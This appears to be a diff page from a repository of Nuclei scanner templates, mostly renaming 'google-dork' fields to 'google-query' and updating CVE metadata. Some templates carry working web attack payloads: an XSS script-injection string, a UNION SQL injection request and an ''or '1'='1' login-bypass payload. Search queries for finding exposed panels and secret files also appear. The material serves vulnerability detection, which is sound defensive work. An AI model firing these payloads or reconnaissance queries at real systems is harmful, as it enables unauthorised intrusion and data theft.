  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-46068.yaml
    skipped 32 lines
    33 33   Host: {{Hostname}}
    34 34   Content-Type: application/x-www-form-urlencoded
    35 35   
    36  - id=1&firstname=Adminstrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
     36 + id=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
    37 37   
    38 38   - |
    39 39   GET /admin/?page=user HTTP/1.1
    skipped 9 lines
    49 49   dsl:
    50 50   - "contains(all_headers_3, 'text/html')"
    51 51   - "status_code_3 == 200"
    52  - - 'contains(body_3, "Adminstrator\"><script>alert(document.domain)</script> Admin")'
     52 + - 'contains(body_3, "Administrator\"><script>alert(document.domain)</script> Admin")'
    53 53   condition: and
    54 54   
  • config/nuclei-templates/cves/2021/CVE-2021-46069.yaml
    Content is identical
  • config/nuclei-templates/cves/2021/CVE-2021-46071.yaml
    Content is identical
  • config/nuclei-templates/cves/2021/CVE-2021-46072.yaml
    Content is identical
  • config/nuclei-templates/cves/2021/CVE-2021-46073.yaml
    Content is identical
  • config/nuclei-templates/cves/2022/CVE-2022-0594.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-0656.yaml
    skipped 13 lines
    14 14   cve-id: CVE-2022-0656
    15 15   cwe-id: CWE-552
    16 16   metadata:
    17  - google-dork: inurl:"/wp-content/plugins/udraw"
     17 + google-query: inurl:"/wp-content/plugins/udraw"
    18 18   verified: "true"
    19 19   tags: wp,wordpress,wp-plugin,unauth,cve,cve2022,lfi,udraw,wpscan
    20 20   
    skipped 25 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-0692.yaml
    skipped 6 lines
    7 7   description: An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.
    8 8   reference:
    9 9   - https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
    10  - - https://www.cvedetails.com/cve/CVE-2022-0692
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0692
    11 11   - https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203
    12 12   - https://github.com/rudloff/alltube/commit/bc14b6e45c766c05757fb607ef8d444cbbfba71a
    13 13   classification:
    skipped 19 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-1597.yaml
    skipped 16 lines
    17 17   cve-id: CVE-2022-1597
    18 18   cwe-id: CWE-79
    19 19   metadata:
    20  - google-dork: inurl:/wp-content/plugins/wpqa
     20 + google-query: inurl:/wp-content/plugins/wpqa
    21 21   verified: "true"
    22 22   tags: wpscan,xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa
    23 23   
    skipped 41 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-1598.yaml
    skipped 14 lines
    15 15   cve-id: CVE-2022-1598
    16 16   cwe-id: CWE-284
    17 17   metadata:
    18  - google-dork: inurl:/wp-content/plugins/wpqa
     18 + google-query: inurl:/wp-content/plugins/wpqa
    19 19   verified: "true"
    20 20   tags: cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan
    21 21   
    skipped 17 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-1906.yaml
    skipped 15 lines
    16 16   cve-id: CVE-2022-1906
    17 17   cwe-id: CWE-79
    18 18   metadata:
    19  - google-dork: inurl:/wp-content/plugins/digiproveblog
     19 + google-query: inurl:/wp-content/plugins/digiproveblog
    20 20   verified: "true"
    21 21   tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022
    22 22   
    skipped 23 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-1946.yaml
    skipped 14 lines
    15 15   cve-id: CVE-2022-1946
    16 16   cwe-id: CWE-79
    17 17   metadata:
    18  - google-dork: inurl:"/wp-content/plugins/gallery-album/"
     18 + google-query: inurl:"/wp-content/plugins/gallery-album/"
    19 19   verified: "true"
    20 20   tags: wpscan,cve2022,wp,xss,wordpress,gallery,unauth,cve,wp-plugin
    21 21   
    skipped 21 lines
  • config/nuclei-templates/cves/2022/CVE-2022-21705.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-27849.yaml
    skipped 15 lines
    16 16   cve-id: CVE-2022-27849
    17 17   cwe-id: CWE-200
    18 18   metadata:
    19  - google-dork: inurl:/wp-content/plugins/simple-ajax-chat/
     19 + google-query: inurl:/wp-content/plugins/simple-ajax-chat/
    20 20   tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure
    21 21   
    22 22  requests:
    skipped 25 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-29004.yaml
    skipped 9 lines
    10 10   - https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt
    11 11   - https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/
    12 12   - https://nvd.nist.gov/vuln/detail/CVE-2022-29004
     13 + - http://phpgurukul.com
    13 14   classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     16 + cvss-score: 6.1
    14 17   cve-id: CVE-2022-29004
     18 + cwe-id: CWE-79
    15 19   metadata:
    16  - verified: true
     20 + verified: "true"
    17 21   tags: cve,cve2022,xss,authenticated,edms
    18  -
    19 22  requests:
    20 23   - raw:
    21 24   - |
    skipped 30 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-29005.yaml
    skipped 9 lines
    10 10   - https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
    11 11   - https://nvd.nist.gov/vuln/detail/CVE-2022-29005
    12 12   classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     14 + cvss-score: 6.1
    13 15   cve-id: CVE-2022-29005
     16 + cwe-id: CWE-79
    14 17   metadata:
    15  - verified: true
     18 + verified: "true"
    16 19   tags: cve,cve2022,xss,obcs,authenticated
    17  -
    18 20  requests:
    19 21   - raw:
    20 22   - |
    skipped 29 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-29548.yaml
    skipped 15 lines
    16 16   cve-id: CVE-2022-29548
    17 17   cwe-id: CWE-79
    18 18   metadata:
    19  - google-dork: inurl:"carbon/admin/login"
     19 + google-query: inurl:"carbon/admin/login"
    20 20   verified: "true"
    21 21   tags: cve,cve2022,wso2,xss
    22 22   
    skipped 21 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-32026.yaml
    skipped 4 lines
    5 5   author: arafatansari
    6 6   severity: high
    7 7   description: |
    8  - Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=.
     8 + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_booking.php?id=.
    9 9   reference:
    10 10   - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md
    11  - - https://nvd.nist.gov/vuln/detail/CVE-2022-32028
    12 11   - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    15 15   cvss-score: 7.2
    16 16   cve-id: CVE-2022-32028
    17 17   cwe-id: CWE-89
    18 18   metadata:
     19 + verified: true
     20 + shodan-query: http.html:"Car Rental Management System"
    19 21   comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username.
    20  - shodan-query: http.html:"Car Rental Management System"
    21  - verified: "true"
    22 22   tags: cve,cve2022,carrental,cms,sqli,authenticated
    23 23   
    24 24  variables:
    skipped 7 lines
    32 32   Content-Type: application/x-www-form-urlencoded
    33 33   
    34 34   username={{username}}&password={{password}}
    35  - 
    36 35   - |
    37  - GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1
     36 + GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1
    38 37   Host: {{Hostname}}
    39 38   
    40 39   skip-variables-check: true
    skipped 14 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-36642.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Omnia MPX 1.5.0+r1 - Path Traversal
    5 5   author: arafatansari,ritikchaddha,For3stCo1d
    6  - severity: high
     6 + severity: critical
    7 7   description: |
    8 8   A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands.
    9 9   reference:
    skipped 1 lines
    11 11   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36642
    12 12   - https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd
    13 13   classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     15 + cvss-score: 9.8
    14 16   cve-id: CVE-2022-36642
     17 + cwe-id: CWE-862
    15 18   metadata:
    16  - verified: true
    17 19   shodan-query: http.title:"Omnia MPX Node | Login"
    18  - tags: cve,cve2022,lfi,traversal,omnia
     20 + verified: "true"
     21 + tags: traversal,omnia,edb,cve,cve2022,lfi
    19 22   
    20 23  requests:
    21 24   - method: GET
    skipped 20 lines
  • config/nuclei-templates/cves/2022/CVE-2022-38463.yaml
    Content is identical
  • config/nuclei-templates/default-logins/apache/ranger-default-login.yaml
    Content is identical
  • config/nuclei-templates/default-logins/phpmyadmin/phpmyadmin-default-login.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/acrolinx-dashboard.yaml
    skipped 11 lines
    12 12   metadata:
    13 13   fofa-query: title=="Acrolinx Dashboard"
    14 14   shodan-query: http.title:"Acrolinx Dashboard"
    15  - google-dork: inurl:"Acrolinx Dashboard"
     15 + google-query: inurl:"Acrolinx Dashboard"
    16 16   tags: acrolinx,panel
    17 17   
    18 18  requests:
    skipped 19 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/amcrest-login.yaml
    skipped 10 lines
    11 11   cwe-id: CWE-200
    12 12   metadata:
    13 13   shodan-query: html:"amcrest"
    14  - google-dork: intext:"amcrest" "LDAP User"
     14 + google-query: intext:"amcrest" "LDAP User"
    15 15   tags: panel,camera,amcrest,edb
    16 16   
    17 17  requests:
    skipped 18 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/atvise-login.yaml
    skipped 10 lines
    11 11   classification:
    12 12   cwe-id: CWE-200
    13 13   metadata:
    14  - google-dork: intitle:"atvise - next generation"
     14 + google-query: intitle:"atvise - next generation"
    15 15   tags: panel,atvise,edb
    16 16   
    17 17  requests:
    skipped 17 lines
  • config/nuclei-templates/exposed-panels/beyondtrust-login-server.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/beyondtrust-panel.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/ems-webclient-panel.yaml
    skipped 4 lines
    5 5   author: pussycat0x,daffainfo
    6 6   severity: info
    7 7   metadata:
    8  - google-dork: inurl:EMSWebClient/
     8 + google-query: inurl:EMSWebClient/
    9 9   tags: panel,ems
    10 10   
    11 11  requests:
    skipped 23 lines
  • config/nuclei-templates/exposed-panels/epson-projector-detect.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/extreme-netconfig-ui.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/fiori-launchpad.yaml
    skipped 7 lines
    8 8   - https://www.exploit-db.com/ghdb/7941
    9 9   metadata:
    10 10   verified: true
    11  - google-dork: sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com
     11 + google-query: sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com
    12 12   tags: sap,fiori,edb,panel
    13 13   
    14 14  requests:
    skipped 22 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/ftm-manager-panel.yaml
    skipped 7 lines
    8 8   metadata:
    9 9   verified: true
    10 10   shodan-query: http.html:"FTM manager"
    11  - google-dork: intitle:"FTM manager"
     11 + google-query: intitle:"FTM manager"
    12 12   tags: panel,ftm
    13 13   
    14 14  requests:
    skipped 17 lines
  • config/nuclei-templates/exposed-panels/hitron-technologies.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/hpe-system-management-login.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/intelbras-login.yaml
    skipped 7 lines
    8 8   - https://www.exploit-db.com/ghdb/7272
    9 9   metadata:
    10 10   shodan-query: http.title:"Intelbras"
    11  - google-dork: intitle:"Intelbras" "All Rights Reserved" -.com
     11 + google-query: intitle:"Intelbras" "All Rights Reserved" -.com
    12 12   tags: panel,edb
    13 13   
    14 14  requests:
    skipped 14 lines
  • config/nuclei-templates/exposed-panels/kenesto-login.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/lansweeper-login.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/linksys-wifi-login.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/minio-console.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/ms-adcs-detect.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/netdata-dashboard-detected.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/openemr-detect.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/projectsend-login.yaml
    skipped 7 lines
    8 8   - https://www.exploit-db.com/ghdb/7380
    9 9   - https://github.com/projectsend/projectsend
    10 10   metadata:
    11  - google-dork: intext:Provided by ProjectSend
     11 + google-query: intext:Provided by ProjectSend
    12 12   tags: panel,projectsend,edb
    13 13   
    14 14  requests:
    skipped 27 lines
  • config/nuclei-templates/exposed-panels/qualcomm-voip-router.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/r-webserver-login.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/roxy-fileman.yaml
    skipped 5 lines
    6 6   severity: info
    7 7   metadata:
    8 8   verified: true
    9  - google-dork: intitle:"Roxy file manager"
     9 + google-query: intitle:"Roxy file manager"
    10 10   tags: tech,fileupload,roxy,fileman
    11 11   
    12 12  requests:
    skipped 23 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/ruckus-unleashed-panel.yaml
    skipped 8 lines
    9 9   - https://www.commscope.com/ruckus/
    10 10   metadata:
    11 11   shodan-query: http.title:"Unleashed Login"
    12  - google-dork: intitle:"Unleashed Login"
     12 + google-query: intitle:"Unleashed Login"
    13 13   tags: panel,ruckus
    14 14   
    15 15  requests:
    skipped 21 lines
  • config/nuclei-templates/exposed-panels/securepoint-utm.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/securityspy-detect.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/slocum-login.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/supermicro-bmc-panel.yaml
    skipped 10 lines
    11 11   - https://www.supermicro.com/white_paper/IPMI_white_paper.pdf
    12 12   metadata:
    13 13   shodan-query: http.title:"Supermicro BMC Login"
    14  - google-dork: intitle:"Supermicro BMC Login"
     14 + google-query: intitle:"Supermicro BMC Login"
    15 15   tags: panel,supermicro,bmc
    16 16   
    17 17  requests:
    skipped 15 lines
  • config/nuclei-templates/exposed-panels/tableau-panel.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/teltonika-login.yaml
    skipped 8 lines
    9 9   - https://www.exploit-db.com/ghdb/7819
    10 10   - https://teltonika-iot-group.com/
    11 11   metadata:
    12  - google-dork: intitle:"Teltonika -Web UI" | intitle:"Teltonika-RUT -Web UI" inurl:"/cgi-bin/luci"
     12 + google-query: intitle:"Teltonika -Web UI" | intitle:"Teltonika-RUT -Web UI" inurl:"/cgi-bin/luci"
    13 13   tags: panel,teltonika,edb
    14 14   
    15 15  requests:
    skipped 14 lines
  • config/nuclei-templates/exposed-panels/unauth-xproxy-dashboard.yaml
    Content is identical
  • config/nuclei-templates/exposed-panels/vrealize-loginsight-panel.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/webmodule-ee-panel.yaml
    skipped 6 lines
    7 7   reference:
    8 8   - https://www.exploit-db.com/ghdb/7001
    9 9   metadata:
    10  - google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
     10 + google-query: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
    11 11   shodan-query: title:"Webmodule"
    12 12   tags: edb,panel,webmodule-ee,login
    13 13   
    skipped 21 lines
  • config/nuclei-templates/exposed-panels/xds-amr-status.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/xweb500-panel.yaml
    skipped 4 lines
    5 5   author: princechaddha
    6 6   severity: info
    7 7   metadata:
    8  - google-dork: inurl:"xweb500.cgi"
     8 + google-query: inurl:"xweb500.cgi"
    9 9   tags: panel,xweb500
    10 10   
    11 11  requests:
    skipped 15 lines
  • config/nuclei-templates/exposures/configs/configuration-listing.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/files/build-properties.yaml
    skipped 5 lines
    6 6   severity: info
    7 7   metadata:
    8 8   verified: true
    9  - google-dork: intitle:"index of" "build.properties"
     9 + google-query: intitle:"index of" "build.properties"
    10 10   tags: exposure,config
    11 11   
    12 12  requests:
    skipped 19 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/files/docker-cloud.yaml
    skipped 6 lines
    7 7   reference: https://www.exploit-db.com/ghdb/7959
    8 8   metadata:
    9 9   verified: true
    10  - google-dork: intitle:"index of" "docker-cloud.yml"
     10 + google-query: intitle:"index of" "docker-cloud.yml"
    11 11   tags: exposure,cloud,devops,docker
    12 12   
    13 13  requests:
    skipped 25 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/files/pantheon-upstream.yaml
    skipped 5 lines
    6 6   severity: low
    7 7   metadata:
    8 8   verified: true
    9  - google-dork: intitle:"index of" "pantheon.upstream.yml"
     9 + google-query: intitle:"index of" "pantheon.upstream.yml"
    10 10   tags: exposure,devops,patheon,config
    11 11   
    12 12  requests:
    skipped 16 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/files/redmine-config.yaml
    skipped 7 lines
    8 8   - https://www.exploit-db.com/ghdb/5803
    9 9   metadata:
    10 10   verified: true
    11  - google-dork: intitle:"index of" configuration.yml
     11 + google-query: intitle:"index of" configuration.yml
    12 12   tags: exposure,redmine,devops,edb
    13 13   
    14 14  requests:
    skipped 30 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/files/redmine-settings.yaml
    skipped 6 lines
    7 7   reference: https://www.exploit-db.com/ghdb/5796
    8 8   metadata:
    9 9   verified: true
    10  - google-dork: intitle:"index of" "settings.yml"
     10 + google-query: intitle:"index of" "settings.yml"
    11 11   tags: misconfig,redmine,devops
    12 12   
    13 13  requests:
    skipped 20 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/files/ruby-rail-storage.yaml
    skipped 5 lines
    6 6   severity: low
    7 7   metadata:
    8 8   verified: true
    9  - google-dork: intitle:"index of" storage.yml
     9 + google-query: intitle:"index of" storage.yml
    10 10   tags: exposure,ruby,devops
    11 11   
    12 12  requests:
    skipped 28 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/files/secrets-file.yaml
    skipped 6 lines
    7 7   reference: https://www.exploit-db.com/ghdb/6283
    8 8   metadata:
    9 9   verified: true
    10  - google-dork: intitle:"index of" "secrets.yml"
     10 + google-query: intitle:"index of" "secrets.yml"
    11 11   tags: misconfig,cloud,devops
    12 12   
    13 13  requests:
    skipped 33 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/files/symfony-properties-ini.yaml
    skipped 5 lines
    6 6   severity: info
    7 7   metadata:
    8 8   verified: true
    9  - google-dork: intitle:"index of" "properties.ini"
     9 + google-query: intitle:"index of" "properties.ini"
    10 10   tags: symfony,exposure
    11 11   
    12 12  requests:
    skipped 20 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/files/symfony-security.yaml
    skipped 5 lines
    6 6   severity: info
    7 7   metadata:
    8 8   verified: true
    9  - google-dork: intitle:"index of" "security.yml"
     9 + google-query: intitle:"index of" "security.yml"
    10 10   tags: symfony,devops,exposure
    11 11   
    12 12  requests:
    skipped 19 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/files/ws-ftp-ini.yaml
    skipped 5 lines
    6 6   severity: low
    7 7   metadata:
    8 8   verified: true
    9  - google-dork: intitle:"Index of" ws_ftp.ini
     9 + google-query: intitle:"Index of" ws_ftp.ini
    10 10   tags: exposure,ftp
    11 11   
    12 12  requests:
    skipped 20 lines
  • config/nuclei-templates/exposures/logs/event-debug-server-status.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/exposures/logs/fastcgi-echo.yaml
    skipped 10 lines
    11 11   - https://www.integrigy.com/oracle-application-server-fastcgi-echo-vulnerability-reports
    12 12   metadata:
    13 13   verified: true
    14  - google-dork: inurl:fcgi-bin/echo
     14 + google-query: inurl:fcgi-bin/echo
    15 15   tags: exposure,logs,oracle,fastcgi,edb
    16 16   
    17 17  requests:
    skipped 20 lines
  • config/nuclei-templates/exposures/logs/zm-system-log-detect.yaml
    Content is identical
  • config/nuclei-templates/exposures/tokens/amazon/aws-access-key-value.yaml
    Content is identical
  • config/nuclei-templates/exposures/tokens/google/google-api-key.yaml
    Content is identical
  • config/nuclei-templates/exposures/tokens/mailchimp/mailchimp-api-key.yaml
    Content is identical
  • config/nuclei-templates/exposures/tokens/slack/slack-bot-token.yaml
    Content is identical
  • config/nuclei-templates/file/audit/cisco/configure-aaa-service.yaml
    Content is identical
  • config/nuclei-templates/file/audit/cisco/configure-service-timestamps-debug.yaml
    Content is identical
  • config/nuclei-templates/file/audit/cisco/configure-service-timestamps-logmessages.yaml
    Content is identical
  • config/nuclei-templates/file/audit/cisco/disable-ip-source-route.yaml
    Content is identical
  • config/nuclei-templates/file/audit/cisco/disable-pad-service.yaml
    Content is identical
  • config/nuclei-templates/file/audit/cisco/enable-secret-for-password-user-and-.yaml
    Content is identical
  • config/nuclei-templates/file/audit/cisco/logging-enable.yaml
    Content is identical
  • config/nuclei-templates/file/audit/fortigate/auto-usb-install.yaml
    Content is identical
  • config/nuclei-templates/file/audit/fortigate/heuristic-scan.yaml
    Content is identical
  • config/nuclei-templates/file/audit/fortigate/inactivity-timeout.yaml
    Content is identical
  • config/nuclei-templates/file/audit/fortigate/maintainer-account.yaml
    Content is identical
  • config/nuclei-templates/file/audit/fortigate/password-policy.yaml
    Content is identical
  • config/nuclei-templates/file/audit/fortigate/remote-auth-timeout.yaml
    Content is identical
  • config/nuclei-templates/file/audit/fortigate/scp-admin.yaml
    Content is identical
  • config/nuclei-templates/file/audit/fortigate/strong-ciphers.yaml
    Content is identical
  • config/nuclei-templates/helpers/payloads/CVE-2020-5776.csv
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/iot/automation-direct.yaml
    skipped 7 lines
    8 8   - https://www.exploit-db.com/ghdb/7295
    9 9   metadata:
    10 10   shodan-query: http.title:"C-more -- the best HMI presented by AutomationDirect"
    11  - google-dork: intitle:"C-more -- the best HMI presented by AutomationDirect"
     11 + google-query: intitle:"C-more -- the best HMI presented by AutomationDirect"
    12 12   tags: panel,iot,edb
    13 13   
    14 14  requests:
    skipped 21 lines
  • config/nuclei-templates/iot/brother-printer-detect.yaml
    Content is identical
  • config/nuclei-templates/iot/brother-unauthorized-access.yaml
    Content is identical
  • config/nuclei-templates/iot/hp-device-info-detect.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/iot/netsurveillance-web.yaml
    skipped 7 lines
    8 8   - https://www.exploit-db.com/ghdb/7288
    9 9   metadata:
    10 10   shodan-query: http.title:"NETSurveillance WEB"
    11  - google-dork: intitle:"NETSurveillance WEB"
     11 + google-query: intitle:"NETSurveillance WEB"
    12 12   tags: tech,iot,edb
    13 13   
    14 14  requests:
    skipped 14 lines
  • ■ ■ ■ ■
    config/nuclei-templates/iot/novus-ip-camera.yaml
    skipped 7 lines
    8 8   - https://www.exploit-db.com/ghdb/8002
    9 9   metadata:
    10 10   verified: true
    11  - google-dork: intitle:"NoVus IP camera" -com
     11 + google-query: intitle:"NoVus IP camera" -com
    12 12   tags: camera,novus,edb,iot,panel
    13 13   
    14 14  requests:
    skipped 19 lines
  • config/nuclei-templates/misconfiguration/hp/unauthorized-hp-printer.yaml
    Content is identical
  • config/nuclei-templates/misconfiguration/hp/unauthorized-printer-hp.yaml
    Content is identical
  • config/nuclei-templates/misconfiguration/hpe-system-management-anonymous.yaml
    Content is identical
  • config/nuclei-templates/misconfiguration/jolokia/jolokia-info-disclosure.yaml
    Content is identical
  • config/nuclei-templates/misconfiguration/jolokia/jolokia-list.yaml
    Content is identical
  • config/nuclei-templates/misconfiguration/jolokia/jolokia-mbean-search.yaml
    Content is identical
  • ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/roxyfileman-fileupload.yaml
    skipped 9 lines
    10 10   - https://www.exploit-db.com/exploits/39963
    11 11   metadata:
    12 12   verified: "true"
    13  - google-dork: intitle:"Roxy file manager"
     13 + google-query: intitle:"Roxy file manager"
    14 14   tags: intrusive,misconfig,edb,roxy,fileman,rce,fileupload
    15 15   
    16 16  requests:
    skipped 67 lines
  • config/nuclei-templates/misconfiguration/shell-history.yaml
    Content is identical
  • config/nuclei-templates/misconfiguration/unauthenticated-glowroot.yaml
    Content is identical
Please wait...
Page is in error, reload to recover